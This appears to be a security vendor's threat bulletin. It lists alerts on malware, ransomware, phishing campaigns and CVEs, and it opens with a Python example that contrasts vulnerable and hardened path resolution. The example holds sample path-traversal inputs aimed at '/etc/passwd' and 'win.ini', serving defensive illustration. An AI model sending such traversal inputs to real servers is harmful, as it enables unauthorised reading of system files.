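This is the third path or directory traversal flaw in this bulletin, after CVE-2024-28995 (Serv-U, 17.6.24) and CVE-2024-4701 (Genie, 14.6.24). As an added illustration that is not code from any of these products, the Python snippet below places the naive pattern behind this bug class (joining a client-supplied path onto a root directory) next to a hardened resolver that decodes once, rejects absolute paths and NUL bytes, canonicalizes, and then checks that the result is still under the document root. The `/srv/files` root and the request paths are assumptions for the example.

```python
import os
from pathlib import Path
from urllib.parse import unquote

# Assumed document root for the example; it does not need to exist on disk.
BASE = Path("/srv/files").resolve()


class TraversalError(ValueError):
    pass


def resolve_vulnerable(user_path: str) -> str:
    """The pattern behind flaws of this class: the client-supplied path is joined as-is."""
    return os.path.normpath(os.path.join(str(BASE), user_path))


def resolve_safe(user_path: str, base: Path = BASE) -> Path:
    """Map a client-supplied relative path to a file under base, or raise TraversalError."""
    # 1. decode exactly once: the web server already decoded the request path, so a
    #    second decode would re-open the hole for double-encoded "%252e%252e"
    decoded = unquote(user_path)
    # 2. reject NUL bytes (C-string truncation), absolute POSIX paths and drive letters
    if "\x00" in decoded or decoded.startswith(("/", "\\")) or decoded[1:3] == ":\\":
        raise TraversalError(user_path)
    # 3. treat backslashes as separators so "..\\" is not a literal file name, then
    #    let the OS canonicalise ".." and symlinks
    candidate = (base / decoded.replace("\\", "/")).resolve()
    # 4. the canonical path must be the root itself or live below it
    if candidate != base and base not in candidate.parents:
        raise TraversalError(user_path)
    return candidate


def is_allowed(user_path: str) -> bool:
    try:
        resolve_safe(user_path)
        return True
    except TraversalError:
        return False


# Constructed request paths: the first is legitimate, the rest are traversal attempts
SAMPLE_PATHS = [
    "reports/q2.csv",
    "../../etc/passwd",
    "reports/../../../etc/passwd",
    "%2e%2e/%2e%2e/etc/passwd",      # URL-encoded dots
    "..\\..\\Windows\\win.ini",      # backslash separators
    "/etc/passwd",                   # absolute path
    "reports/q2.csv\x00.png",        # NUL truncation
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        verdict = "ok" if is_allowed(p) else "REJECTED"
        print(f"{p!r:34} naive -> {resolve_vulnerable(p):28} hardened -> {verdict}")
```

The check that matters is the last one: a deny-list of `..` sequences misses encoded and mixed-separator variants, whereas comparing the canonicalized result against the root catches every spelling of the same escape. The "decode once" rule assumes the framework has already percent-decoded the path before calling the resolver; if it has not, decode in the resolver and nowhere else.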

6.6.24 | Rising trend of exploiting Packer apps in targeted attacks | ALERTS | VIRUS | An increasing trend of abusing commercial packer applications to deploy malware payloads has been observed in the wild. Numerous known malware families, primarily RATs and stealers, have been using such packers in attacks targeting financial institutions and government organizations. BoxedApp is one such packer: it offers features like virtual storage, virtual processes, and a virtual registry, making the packed malware harder for endpoint protection products to detect or analyze.
6.6.24 | The rise of Kiteshield packer in the ever-evolving landscape of Linux malware | ALERTS | VIRUS | Threat actors constantly seek new tactics and platforms to evade detection and carry out their espionage activities. Most recently, an increasing focus on the Linux platform has been observed, resulting in a surge of Linux malware, and threat actors are using the Kiteshield packer to evade detection on Linux.
6.6.24 | CoinMiner's Proxy Server Suffers Unlucky Ransomware Attack | ALERTS | RANSOM | Reports describe what appears to be an accidental collision between threat actors: a proxy server operated by a CoinMiner group was exposed to the Internet and became the target of a ransomware actor's RDP scanning attack. If this kind of overlap becomes more common it may complicate threat analysis, as it blurs the lines between different attack groups and their intentions.
6.6.24 | SenSayQ: Emerging Ransomware Group | ALERTS | RANSOM | SenSayQ is an emerging ransomware actor recently observed in the threat landscape. At this time their modus operandi remains largely unknown, but they employ double-extortion tactics, exfiltrating data from company environments and encrypting files. The group uses a LockBit variant for encryption and drops ransom notes ([randomID].README.txt) in most folders, the content of which starts with "---Welcome! Your are locked by SenSayQ!---". As with other ransomware actors, victims are pressured to make contact within 72 hours or else their stolen data will be published on the attackers' website.
6.6.24 | New Linux variant of the TargetCompany ransomware | ALERTS | RANSOM | A new Linux variant of the TargetCompany (aka Mallox) ransomware family has been found in the wild. As reported by Trend Micro, the threat group using this Linux variant is actively attacking ESXi environments. The attackers also use a custom shell script to deliver the payload and exfiltrate the victim's information. The malware encrypts user data and appends the .locked extension to encrypted files. Once encryption completes, a ransom note in the form of a text file called "HOW TO DECRYPT.txt" is dropped on the victim's machine.
6.6.24 | Updated Cuckoo malware variant spotted in the wild | ALERTS | VIRUS | Cuckoo is infostealing macOS malware first discovered earlier this year, and a new variant has just been observed in the wild, distributed via a fake Homebrew macOS package manager website. The malware has the usual infostealing features, allowing it to steal confidential information, credentials, browser cookies and cryptocurrency wallets and to exfiltrate the collected data to attacker-controlled C2 servers. The new variant has also added virtual machine detection capabilities.
6.6.24 | RansomHub Ransomware | ALERTS | RANSOM | In a newly released report, Symantec's Threat Hunter Team provides an analysis of the highly active RansomHub ransomware and its similarity to the now-defunct Knight ransomware. The analysis indicates that the developers of RansomHub are not the same people who developed Knight, but given the significant code overlap it is assumed that the RansomHub developers likely purchased the Knight source code, which was offered for sale in early 2024. As with other groups, RansomHub attacks involve vulnerability exploitation and dual-use tools to aid in distribution.
6.6.24 | DarkCrystal RAT Delivered via Signal Messenger | ALERTS | VIRUS | The messaging application Signal, widely used within the military, is currently being abused to deliver DarkCrystal RAT to government officials, military personnel, and representatives of defense enterprises in Ukraine. The infection chain begins when the victim receives a message containing an archive, its password, and instructions to open it. Inside the archive is an executable (".pif" or ".exe") that is a RAR SFX (self-extracting) archive containing a VBE file, a BAT file, and an EXE file. Running these files infects the computer with DarkCrystal RAT, granting the attackers unauthorized access.
6.6.24 | Cobalt Strike campaign targets Ukraine using malicious Excel files | ALERTS | CAMPAIGN | A new campaign targeting Ukraine with Cobalt Strike payloads has been observed by researchers from Fortinet. The attackers use a multi-stage approach, delivering Excel files containing malicious VBA macros, followed by DLL downloaders and injectors in later stages. The Cobalt Strike payloads allow the attackers to communicate with command and control (C2) servers and execute arbitrary commands.
6.6.24

Android Spyware Targets Brazilian Mobile Users in Nubank Masquerade | ALERTS | VIRUS | Nubank, a leading digital bank in Latin America known for its no-fee credit card and mobile banking services, has been one of the latest financial companies to have its brand abused in social engineering schemes aimed at luring mobile users in Brazil. An actor has fabricated malicious Android applications (Nubank.apk) to appear related to Nubank. These applications are likely being distributed via malicious SMS or other social platforms. If a user is successfully lured and installs the fake Nubank app on their mobile device, they will end up with a well-known remote access trojan known as SpyNote.

6.6.24

CVE-2024-24919 - Check Point Security Gateway Information Disclosure Vulnerability | ALERTS | VULNEREBILITY | CVE-2024-24919 is an information disclosure vulnerability in Check Point Security Gateway. Check Point Security Gateway is an integrated software solution that connects corporate networks, branch offices, and business partners via a secure channel. Successful exploitation of this vulnerability may allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or the mobile access software blade. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.

6.6.24

CVE-2024-27348 - Remote Code Execution vulnerability in Apache HugeGraph Server | ALERTS | VULNEREBILITY | Recently, a critical remote code execution (RCE) vulnerability has been discovered in Apache HugeGraph-Server, identified as CVE-2024-27348 (CVSS: 9.8). Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. The vulnerability affects versions 1.0.0 to 1.3.0 in Java8 and Java11 and allows an attacker to execute arbitrary commands on the server. If successfully exploited, the impact can be severe, as it can allow attackers to gain full control over the server, manipulate data, and potentially compromise the entire system. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.

6.6.24

Underground Ransomware Remains Active | ALERTS | RANSOM | Over the past year the ransomware actor known as "Underground" has been less active than other groups, yet they remain in the threat landscape and continue to target organizations of various sizes across industries. They are known to generate a lengthy ransom note (!!READ_ME!!.txt) detailing the information that has been exfiltrated. Victims are provided with an ID and a password that allow them to contact the ransomware group through a website on the TOR network.

6.6.24

Botnet malware campaign distributing NiceRAT malware | ALERTS | VIRUS | A botnet malware campaign has been reported distributing the NiceRAT malware, disguised as Windows or Office genuine authentication tools or free game servers, through domestic file-sharing sites or blogs. NiceRAT is a Python-based open-source program with anti-debugging and anti-virtual machine capabilities. It collects system information, browser information, and cryptocurrency data from compromised systems and exfiltrates the collected data to the threat actors' Discord channel, which is used as a Command and Control (C&C) server.

6.6.24

LummaC2 Infostealer Delivered via a Recent ClearFake Campaign | ALERTS | VIRUS | ClearFake, a JavaScript framework, utilizes both drive-by-downloads and social engineering tactics, often in fake "browser update" campaigns. Recently, researchers uncovered a new strategy by ClearFake, where users are deceived into manually executing malicious code in PowerShell. This differs from previous tactics where users were typically lured into unwittingly downloading a malicious payload. The change aims to evade security measures and eventually install LummaC2 infostealer malware.

6.6.24

Brazilian banking trojan CarnavalHeist | ALERTS | VIRUS | A recent campaign has seen Brazilian users being targeted by a banking Trojan dubbed CarnavalHeist. The infection chain begins with a financially themed email through which the recipient is lured into downloading an invoice (named "Nota Fiscal", Portuguese for invoice). The actual download is a malicious LNK file which leads to further downloads and executions of script components that are responsible for delivering the final malicious payload. Details regarding the campaign and suspected attacker information were made available in a newly published report by Cisco Talos.

6.6.24

RedTail cryptomining malware exploiting PAN-OS vulnerability | ALERTS | CRYPTOCURRENCY | RedTail cryptocurrency mining malware has added a PAN-OS vulnerability to its exploit arsenal. PAN-OS CVE-2024-3400 is a now patched vulnerability that allows an attacker to execute arbitrary code with root user privileges. Exploiting this PAN-OS vulnerability and executing the commands successfully can lead to the downloading of the RedTail payload. This malware employs advanced evasion and persistence techniques. RedTail has also used other propagation mechanisms involving other vulnerability exploits (such as CVE-2023-46805 and CVE-2024-21887).

31.5.24

Malicious activity by LilacSquid threat group | ALERTS | GROUP | A recently disclosed infostealing campaign attributed to the threat group known as LilacSquid has been active since at least 2021. As reported by Cisco Talos, the attackers have been targeting vulnerable public-facing servers and leveraging compromised RDP credentials to deploy a wide range of tools and malware in their attacks. LilacSquid has been observed to use the open-source remote management tool MeshAgent, a customized variant of the QuasarRAT malware dubbed PurpleInk, and other malware loaders such as InkBox or InkLoader. The deployed PurpleInk payload allows the attackers to collect various information from the compromised endpoint, enumerate, read or delete files, execute remote shells and forward data to C2 servers controlled by the attackers, among other functions.

31.5.24

Unveiling cryptocurrency mining tactic of the 8220 Gang | ALERTS | CRYPTOCURRENCY | The 8220 Gang, a widely recognized threat actor based in China and driven by financial motives, has been active since 2017. Specializing in deploying cryptocurrency-mining malware, they primarily target cloud-based environments and Linux servers, exploiting known application vulnerabilities as part of their tactics, techniques, and procedures (TTPs).

31.5.24

SmallTiger malware campaign reported targeting Korean companies | ALERTS | CAMPAIGN | A malware campaign distributing SmallTiger malware has been reported targeting Korean companies in the defence, automobile parts, and semiconductor manufacturing sectors. This malware acts as a downloader, connecting to the attackers' C&C server to fetch and execute the final payload in memory. As part of the attack chain, the attackers install Mimikatz and ProcDump on the compromised systems. The ProcDump tool is used to dump the memory of the LSASS process, thereby stealing credentials from the infected systems. Additionally, a command-line tool is utilised to extract and display account information and web browser history.

30.5.24

BitRAT and Lumma Stealer spread as fake browser updates | ALERTS | VIRUS | A new campaign delivering BitRAT and Lumma Stealer malware has been observed in the wild. The malware is spread via fake browser updates. The attack chain is initiated by users visiting compromised websites and triggering malicious JavaScript code that redirects them to fake update websites. Further down the chain, malicious PowerShell scripts lead to the retrieval of malware loaders and final payload execution. The attackers can leverage the delivered payloads to gain control over the compromised endpoints, execute remote commands, and steal information.

30.5.24

Metamorfo Banking Trojan | ALERTS | VIRUS | Metamorfo is a banking Trojan malware (aka Casbaneiro) that is spread through malspam campaigns luring users to click on HTML attachments. The HTML attachment contains malicious code that kicks off processes with the main focus on exfiltrating victims’ financial information including banking credentials.

30.5.24

Datebug updating toolkits with Golang to be cross-platform | ALERTS | APT | APT group Datebug, in operation since 2013, has been observed updating their toolkit with a new data exfiltration tool written in Golang, created with the goal of targeting APAC governments and defense sectors. The group utilizes phishing emails to lure recipients into opening an attached or linked malicious ZIP or ISO file, which leads to the data exfiltration tool being installed.

30.5.24

NSIS-based packer usage observed in many common malware families | ALERTS | VIRUS | The Nullsoft Scriptable Install System (NSIS) is an open-source installer system commonly abused by cybercriminals to package malware. It is used to generate self-extracting custom installers, which have been observed delivering many different malware families. A recent report by Check Point Research provides details on a group of packers using this system.

30.5.24

CatDDoS: A rising threat across multiple sectors | ALERTS | BOTNET | A rise in activity involving a Mirai distributed denial-of-service (DDoS) botnet variant called CatDDoS has been observed. Multiple threat actors are employing various CatDDoS variants to target organizations across multiple sectors, including cloud vendors, communication providers, scientific and research entities, and educational institutions. The vulnerabilities exploited under CatDDoS affect numerous products and technologies, such as Jenkins servers, Apache ActiveMQ servers, Apache Log4j, Cisco Linksys, and NetGear routers, among others.

30.5.24

Mexican Telecom Continuously Impersonated by SpyNote Actor | ALERTS | VIRUS | Since at least October 2023, a SpyNote actor has been abusing the brand of a well-known and prominent telecommunications company in Mexico that operates extensively across Latin America and the Caribbean, serving millions of customers in countries such as Argentina, Brazil, Chile, Colombia, and many more.

30.5.24

AllaSenha - new AllaKore malware variant | ALERTS | VIRUS | AllaSenha is a new banking malware variant from the AllaKore RAT family that has recently been used in distribution campaigns targeted at banking users in Brazil. The multi-staged infection chain leverages malicious .lnk files possibly delivered through phishing, BPyCode launcher binaries and a DLL loader dubbed ExecutorLoader that leads to the final AllaSenha payload. The malware functionality focuses on theft of user credentials associated with Brazil’s most popular banks. The targeted data includes passwords, QR codes and 2FA tokens. The malware abuses Azure Cloud infrastructure for the purpose of C2 communication and data exfiltration.

30.5.24

Zonix Ransomware | ALERTS | RANSOM | Zonix is a recently discovered ransomware variant from the Xorist malware family. The malware encrypts user files and appends the ".ZoN" extension to them. Zonix drops a ransom note as a text file called "HOW TO DECRYPT FILES.txt" and also displays a pop-up window on the desktop demanding 1500 USD in bitcoin for the decryption of the locked files.

30.5.24

CVE-2024-32640 - SQL Injection vulnerability in Mura/Masa CMS | ALERTS | VULNEREBILITY | CVE-2024-32640 is a recently disclosed SQL injection vulnerability affecting Mura/Masa CMS, which is an open source enterprise content management system. If successfully exploited, the vulnerability might allow unauthorized attackers to access sensitive data. The product vendor has already released a patch to remediate this vulnerability in software versions 7.4.6, 7.3.13 and 7.2.8.

30.5.24

Emergence of a new North Korean threat actor dubbed Moonstone Sleet | ALERTS | APT | A recent emergence in the threat landscape involves a new North Korean actor dubbed Moonstone Sleet. This actor has been detected engaging in various deceptive tactics, including the establishment of fake companies and job listings to lure potential targets. Additionally, they have been distributing trojanized versions of legitimate software tools, developing malicious games, and introducing a novel custom ransomware named FakePenny, comprising a loader and an encrypter. Their targets span individuals and organizations across sectors such as software and information technology, education, and the defense industrial base.

30.5.24

Fraudulent PDF Viewer Login Pages Phishing for User Credentials | ALERTS | PHISHING | A phishing campaign was recently observed where a malicious HTML attachment masquerading as a PDF Viewer login page prompts users to verify their password to access a document. Meanwhile, hidden in the background, malicious JavaScript attempts to steal the victim's credentials.

30.5.24

Agent Tesla: The Uninvited Guest at Indonesia's GEMASTIK 2024 Event | ALERTS | VIRUS | Symantec has recently observed a peculiar malspam campaign in Indonesia where the actor is running a sophisticated email scheme impersonating the School of Electrical Engineering and Informatics (STEI) at the Institut Teknologi Bandung (ITB) in Indonesia.

30.5.24

Red Akodon threat group recent activities | ALERTS | VIRUS | According to a recent report published by SCITUM, Red Akodon is a new threat group conducting its malicious activities prevalently in Colombia since at least April 2024. The threat actors have been observed to target various public organizations and other businesses with a variety of commodity malware variants such as Remcos, QuasarRAT, Neshta, XWorm or AsyncRAT. The attack chain often relies on phishing emails coming from compromised accounts. The attackers have been leveraging malicious .svg files either directly attached to malspam or hosted on public file hosting repositories. The attacks conducted by this threat group aim at information exfiltration and gaining control over the compromised endpoints.

30.5.24

TXZ file extension: Evolution of malware distribution in email campaigns | ALERTS | VIRUS | Threat actors usually send malicious emails with attachments carrying a malicious payload, or they send out containers such as archives that include the malicious files. In a recent campaign, multiple emails carrying files with the TXZ extension as attachments were observed. Late last year, Microsoft added native support to Windows 11 for the TXZ filetype. This means recipients of the malicious messages would have been able to open the TXZ attachment using Windows File Explorer if they are using the Windows 11 operating system. This shows that TXZ attachments are actively used in some regionally targeted campaigns, and their use may grow in the future with the adoption of Windows 11 or higher.

30.5.24

Gipy malware distributed under the disguise of AI voice generator tools | ALERTS | VIRUS | A new malicious campaign spreading infostealing malware dubbed Gipy has been observed in the wild. The malware binaries are masqueraded as an AI voice generator tool and distributed via phishing websites. Some examples of the package names observed for this malware are as follows: VoiceAIbeta-x64.exe, VoiceAIAdvancedPro.exe, VoiceAiPro-x64.exe, VoiceAIChanger.exe, etc. Next to typical infostealing features, the malware has capabilities to download and execute additional arbitrary payloads. Various malware families have been observed among the malware payloads downloaded by Gipy, including: Lumma Stealer, Redline Stealer, DCRat, RadxRAT, RisePro, TrueClient and more.

28.5.24

Embargo Ransomware | ALERTS | RANSOM | Embargo is a new Rust-based ransomware variant identified in the wild. The malware encrypts user files and appends the “.564ba1” extension to them. The ransom note is dropped in the form of a text file called “HOW_TO_RECOVER_FILES.txt”, advising the victims to register on the attackers' portal via the provided onion site link. The threat actors behind this malware have been reported to be employing the double extortion technique by not only encrypting confidential data but also exfiltrating it and threatening the victims with public release.

28.5.24

Rising popularity of Arc browser overshadowed by malvertising campaign | ALERTS | CAMPAIGN | The Arc browser, developed by The Browser Company, has been gaining a lot of popularity in the market, promising to personalize the way users browse the internet. With its innovative user interface design that sets it apart from traditional browsers, it started receiving even more attention after becoming available for Windows, whereas previously it was only intended for macOS systems.

28.5.24

Phishing campaign targeting financial institutions impersonates medical center | ALERTS | PHISHING | A phishing campaign targeting European and US financial institutions has been reported. The attacks involve sending emails impersonating a medical center, with SCR files disguised as financial documents to trick victims into downloading and executing them. These files contain code from a Python clone of the Minesweeper game, along with malicious Python code that downloads additional scripts from a remote source. The scripts are then used to extract and run a legitimate remote computer management program called SuperOps RMM, which provides unauthorized remote access to victims' computers.

28.5.24

Iluria Stealer | ALERTS | VIRUS | There have been reports of in-the-wild activity for a run-of-the-mill stealer known as Iluria. Like many other forks and variants of Discord Stealers, it is capable of stealing tokens, browser credentials, and payment information. The malware is currently being advertised, and for now, consumers appear to be the focus via drive-by-download attacks. In addition, multiple test samples have also been observed.

28.5.24

Rise of Fake AV websites hosting advanced malware | ALERTS | VIRUS | Recently, there has been an increase in the number of fake antivirus (AV) websites pretending to be legitimate solutions. These deceptive sites have been found hosting advanced malicious files, such as APKs, EXEs, and Inno Setup installers, which can deliver spyware like the SpyNote Trojan and data-stealing malware such as Lumma and StealC. These malicious programs are adept at harvesting victim information, including browser data, and sending it to remote servers under the control of attackers.

28.5.24

CVE-2024-30268: XSS Vulnerability in Cacti | ALERTS | VULNEREBILITY | CVE-2024-30268 is a reflected cross-site scripting vulnerability in Cacti, a network monitoring and fault management framework. If successfully exploited, this vulnerability allows attackers to obtain the administrator's cookies and use them to impersonate the administrator's login session. The vulnerability has been fixed in versions 1.3.x DEV. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.

28.5.24

CVE-2024-21793 and CVE-2024-26026 - two recent vulnerabilities affecting F5 BIG-IP Next Central Manager | ALERTS | VULNEREBILITY | CVE-2024-21793 and CVE-2024-26026 are two recently identified high severity vulnerabilities affecting the F5 BIG-IP Next Central Manager. Both flaws are code injection vulnerabilities and have been given a CVSS score of 7.5. If successfully exploited, they might allow unauthenticated attackers to run malicious SQL statements through the BIG-IP Central Manager API.

28.5.24

CVE-2020-17519: Directory Traversal Vulnerability in Apache Flink | ALERTS | VULNEREBILITY | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently added a three-year-old directory traversal vulnerability (CVE-2020-17519) in Apache Flink to the Known Exploited Vulnerabilities Catalog. Apache Flink is an open-source batch-processing framework used for distributed processing of streaming data and is widely used in the field of big data. If successfully exploited, this vulnerability allows unauthenticated attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.

28.5.24

Android BankBot impersonates Uzbekistan banks | ALERTS | VIRUS | In recent days, mobile users in Uzbekistan have been targeted by an Android BankBot campaign where actors are disguising their malware as fictitious banking apps (Xalq Banki Credit.apk & Bank Ipak.apk), impersonating two Uzbekistan banks: Xalq Banki and Ipak Yuli. If a user is successfully lured into installing these on their mobile phone, BankBot will monitor for when the user launches any banking apps it is coded to target. It will then leverage the classic overlay technique, overlaying a fake page on top of the legitimate one in order to steal the user's inputs, such as credentials. At this time, the vector of infection remains unknown, but it is very likely that these are being spread via malicious SMS messages or redirections.

25.5.24

Path Traversal Vulnerability in Nexus Repository CVE-2024-4956 | ALERTS | VULNEREBILITY | CVE-2024-4956 is a path traversal vulnerability in Sonatype Nexus Repository 3. Nexus Repository is a widely used artifact repository manager. If successfully exploited, this vulnerability allows unauthenticated remote attackers to access and download sensitive system files, application source code and configurations. The CVSS score of this vulnerability is 7.5. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.

25.5.24

Operation Diplomatic Specter: A Chinese APT campaign targeting political entities in multiple regions | ALERTS | APT | An ongoing campaign dubbed Operation Diplomatic Specter, targeting political entities in the Middle East, Africa, and Asia, has been reported. A Chinese APT group behind the campaign has been leveraging rare email exfiltration techniques against compromised servers.

25.5.24

RustDoor malware exploits JAVS Viewer vulnerability in courtroom software | ALERTS | VIRUS | A Windows-based malware named RustDoor has been observed being distributed via a compromised audio-visual recording software package used in courtroom environments. This backdoor enables attackers to gain full control of affected systems and transmit data about the host system to a command-and-control (C2) server. The malware exploits a deserialization vulnerability in JAVS Viewer software, tracked as CVE-2024-4978. JAVS technologies are utilized in courtrooms, jails, prisons, councils, hearings, and lecture halls nationwide, with more than 10,000 installations worldwide.

23.5.24

Expanded operations of the Sharp Dragon APT | ALERTS | APT | As reported by Check Point, the Sharp Dragon APT group (formerly known as Sharp Panda) has been expanding its operations towards targets in Africa and in the Caribbean. Sharp Dragon is known to use large-scale phishing attacks, malicious RTF files and DLL loaders, but most recently also executable loaders disguised as documents. The threat group has also been reported to leverage the CVE-2023-0669 RCE vulnerability affecting Fortra GoAnywhere in their attacks.

23.5.24

CVE-2024-29895 - Command Injection Vulnerability in Cacti | ALERTS | VULNEREBILITY | CVE-2024-29895 is a critical (CVSS score 10) command injection vulnerability affecting Cacti, which is a network monitoring and fault management framework. If successfully exploited, the vulnerability may allow unauthenticated remote attackers to execute arbitrary commands on the affected servers through URL manipulation. While the vulnerability has not yet been reported as being exploited in the wild, a Proof of Concept for it is publicly available. The product vendor has already released a patch to remediate this vulnerability.

23.5.24

Waltuhium Grabber | ALERTS | HACKING | Waltuhium is an open-source infostealer that has been observed being shared in dark web forums. It is claimed to have features such as keylogging, screenshot capturing, WiFi stealing, Discord injection, password stealing, credit card stealing, cryptocurrency and wallet stealing, as well as tokens from Discord and browsers, and session stealing. Additionally, it has anti-VM and anti-debug functionality. The stolen data is zipped and posted to a defined Discord webhook server.

23.5.24

GuLoader Impersonates an Italian Seafood Distributor | ALERTS | VIRUS | GuLoader, an advanced downloader, is showing no signs of stopping, and its prevalence continues to increase with more and more campaigns observed around the world. One campaign was recently identified where actors are posing as a known Italian company that specializes in the wholesale and retail distribution of seafood, sourcing and importing its products from various countries.

23.5.24

CLOUD#REVERSER campaign leverages cloud storage for malware delivery | ALERTS | CAMPAIGN | A new campaign dubbed CLOUD#REVERSER has been reported to abuse various cloud storage repositories such as Dropbox or Google Drive for malware delivery and C&C purposes. The attackers leverage phishing emails with malicious attachments in the initial attack stages and several VBScript and PowerShell-based payload executions in later stages. The dropped malware has the functionality to exfiltrate user data, execute arbitrary commands and scripts received from the attackers, as well as download additional binaries and execute them on the infected endpoints.

23.5.24

Acrid infostealer leverages “Heaven’s Gate” technique | ALERTS | VIRUS | Acrid is a recently identified C++-based infostealing malware. In its functionality, it is very similar to other infostealer variants currently present in the threat landscape. Its main functionality relies on collecting various user data from the compromised endpoints and exfiltrating it to the C&C servers controlled by the attackers. Acrid focuses on the theft of data such as browser cookies, passwords stored in browsers, banking information, cryptocurrency wallets, and credentials stored in various applications. Acrid has been reported to leverage the "Heaven’s Gate" technique, which effectively enables 64-bit code to be executed within a 32-bit process, potentially allowing the malware to evade security controls that monitor only 32-bit processes.

23.5.24

CVE-2023-43208 - NextGen Healthcare Mirth Connect RCE vulnerability exploited in the wild | ALERTS | VULNEREBILITY | CVE-2023-43208 is a Remote Code Execution (RCE) vulnerability disclosed in October last year. The vulnerability affects NextGen Healthcare Mirth Connect prior to version 4.4.1, which is an open-source data integration suite used by healthcare companies. If exploited, the vulnerability may allow unauthenticated remote attackers to execute code on affected systems, leading to the compromise of critical healthcare data. The vulnerability has been reported as being exploited in the wild and has been added to the "Known Exploited Vulnerabilities Catalog" (KEV) by CISA.

23.5.24

GhostEngine malware terminates EDR agents and deploys coin miner | ALERTS | VIRUS | A multimodule malware dubbed GhostEngine has been observed in the wild. This malware leverages vulnerable drivers to terminate and delete known Endpoint Detection and Response (EDR) agents that would likely interfere with the deployed coin miner.

22.5.24

Smishing: Fake IRS Scare Tactic to Snatch Cryptowallets' 12-Word Recovery Phrases | ALERTS | PHISHING | Symantec has recently observed a malicious SMS campaign in the US targeting mobile users' cryptowallet 12-word recovery phrases. The actors are impersonating the IRS and using a scare tactic related to cryptocurrency holdings declaration.

22.5.24

XWorm v5.6 malware | ALERTS | VIRUS | A new v5.6 variant of the XWorm malware has been observed in the wild. The malware is distributed under the disguise of various applications, games or adult content, with the binaries spread through either online sharing repositories or via torrent downloads. XWorm has miscellaneous capabilities including keylogging, data theft, download of additional arbitrary payloads, RAT functionalities and others.

22.5.24

Malware campaign uses LNK files and MSBuild to likely deliver TinyTurla backdoor | ALERTS | VIRUS | A malware campaign utilizing malicious LNK files has been observed. The threat actors behind the campaign are using human rights seminar invitations and public advisories to lure users. Once lured, MSBuild is used to execute and deliver a fileless final payload. This payload is believed to be the TinyTurla backdoor, based on its first-stage backdoor functionalities and utilization of a specific C2 infrastructure.

22.5.24

Keyplug backdoor distributed against organizations in Italy | ALERTS | VIRUS | A new campaign attributed to the Grayfly threat group (aka APT41) has been distributing the Keyplug modular malware to various organizations in Italy. As reported by Yoroi, this C++-based malware comes in variants supporting both Windows and Linux platforms. Keyplug has the capability to initiate C2 communication with attacker servers either via abuse of Cloudflare's CDN (Content Delivery Network) or via the WSS protocol.

21.5.24

Deuterbear RAT targets Asia-Pacific in advanced cyber espionage campaign | ALERTS | VIRUS | A cyber espionage campaign has been reported targeting the Asia-Pacific region, involving the deployment of a remote access trojan (RAT) called Deuterbear. The RAT exhibits advanced capabilities, such as anti-analysis techniques, avoiding handshakes during RAT operation, anti-memory scanning, and using HTTPS for command-and-control (C&C) communication. The Deuterbear infection chain involves two stages: the first stage functions as a plugin downloader, while the second stage acts as a backdoor, harvesting sensitive information from the compromised host.

21.5.24

SamsStealer malware | ALERTS | VIRUS | Reports have emerged of a new infostealer, dubbed SamsStealer, circulating in the threat landscape. This malware covertly infiltrates victims' systems, exfiltrating various forms of personal data, including login credentials, cryptocurrency wallets, session data, and browsing history. The stolen data is transmitted to file-sharing services and messaging platforms like Telegram, which are used as command-and-control (C2) servers by the attackers.

21.5.24

Bank Mellat Users in Various Countries Targeted by FakeBank Campaign | ALERTS | CAMPAIGN | Symantec has observed an Android FakeBank campaign targeting mobile users of a private Iranian bank known as Mellat, by posing as a fictitious banking app (Mellat.apk). Bank Mellat, also known as "Bank of the Nation", has a number of offices and branches both domestically within Iran and internationally.

21.5.24

Vultur Malware Poses as Antivirus | ALERTS | VIRUS | Recently, a Vultur campaign has been observed in which the actor is disguising it as a known antivirus mobile application (<company name>_Security.apk). This Android banking malware leverages the overlay technique, displaying fake overlay windows in the hope of tricking users into entering their banking credentials. It targets hundreds of banks and cryptocurrency exchange platforms.

21.5.24

HijackLoader gets new modules to lay low | ALERTS | VIRUS | HijackLoader is a multi-stage loader that has recently seen some updates. The first stage decrypts and decompresses additional modules and executes a second stage. The second-stage process lives in memory and reads an embedded or remotely hosted image in order to fully initialize itself and load additional modules. Some of the newly discovered modules, such as a User Account Control bypass, are designed to allow for additional persistence in the target environment.

21.5.24

Antidot mobile malware | ALERTS | VIRUS | Antidot is a recently discovered banking trojan for Android. The malware is distributed under the disguise of a Google Play update app. Functionality-wise, Antidot is capable of keylogging, overlay attacks, SMS exfiltration, screen captures, credential theft, device control and execution of commands received from the attackers. The malware has the capability to establish HTTP connections or WebSocket communication to the C2 servers.

21.5.24

Chaos Ransomware Lures Gamers with Fake Free Discord NitroALERTSRANSOMAs the Chaos Ransomware builder is widely available to the public, instances are observed on a daily basis around the world with both consumers and enterprises being targeted. Recently, one actor has been luring consumers, more specifically gamers, with a Chaos Ransomware disguised as a fake free Discord Nitro. Within the ransom note, the actor is hoping to extort compromised users of 0.003 BTC, which is the equivalent of 195 USD at the time of writing.

21.5.24

Synapse RansomwareALERTSRANSOMSynapse is a ransomware written in C that can encrypt local files, files on removable drives, and files stored on network shares, with the capability of propagating to other systems on a network. Encrypted files will have the extension .Synapse added to them. Additionally, a ransom note named [random_string].README.txt is dropped. The ransomware has the capability to collect system information and encryption statistics, and exfiltrate the data to its remote C2 server. Victims are provided with a URL (hosted on the Tor network) as a means of contact.

21.5.24

Storm-1811 threat actor conducts Vishing attack via Quick Assist toolALERTSGROUPThreat actor Storm-1811 has been reported carrying out a vishing (voice phishing) attack using the client management tool Quick Assist. Quick Assist is an application that enables a user to share their system with another person over a remote connection to resolve issues. Once the user grants full control, the threat actor executes scripts that lead to the download of batch files with the aim of deploying Black Basta ransomware as the final payload throughout the network.

21.5.24

